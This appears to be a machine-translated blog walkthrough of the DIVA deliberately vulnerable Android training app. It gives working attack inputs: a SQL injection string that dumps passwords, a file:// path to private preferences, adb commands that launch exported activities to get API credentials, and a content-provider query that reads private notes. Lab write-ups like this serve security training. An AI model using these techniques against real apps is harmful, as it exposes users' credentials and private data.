Aquaboutic | Focus Security Research | Vulnerability Exploit | POC

Home

android app vulnerability learning (2)

Posted by fleschner at 2020-03-10
all

Next to the unfinished article "Android App vulnerability learning (I)", we will continue the rest of the article.

Part 7 unsafe input 1 (sqli)

Open log:

ADB logcat

Enter a single quotation mark. You can see the error message in the log. There is SQL injection.

Enter 'or' 1 '=' 1 to return all user passwords.

Part 8 unsafe input 2 (read local file)

Access to any local file, input

file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml

Part 9 access control 1 (activity 1)

To view the activity components exposed in the androidmanifest.xml file:

Use am (activity manager tool) to start exposed components to bypass permission control:

adb shell am start jakhar.aseem.diva/.APICredsActivity

adb shell am start -n jakhar.aseem.diva/.APICredsActivity -a jakhar.aseem.diva.action.VIEW_CREDS

You can also use drozer to do this:

Part 10 access control 2 (activity 2)

Input ADB shell am start jakhar. Aseem. Diva /. Apicreds2activity, and the situation in part9 does not appear. The verification pin code is added.

Part 11 access control 3 (content providers)

To find exposed content providers components:

Then look for the SmalI file that contains content: / /.

$ grep -lr “content://” *

View private log content

$ adb shell content query –uri content://jakhar.aseem.diva.provider.notesprovider/notes

Another way: using drozer:

summary

In this paper, the last unfinished content is roughly mentioned. You can raise any questions during the learning test. Let's communicate with each other. In order to better communicate, please join in the learning group, ask the author boldly and grow together.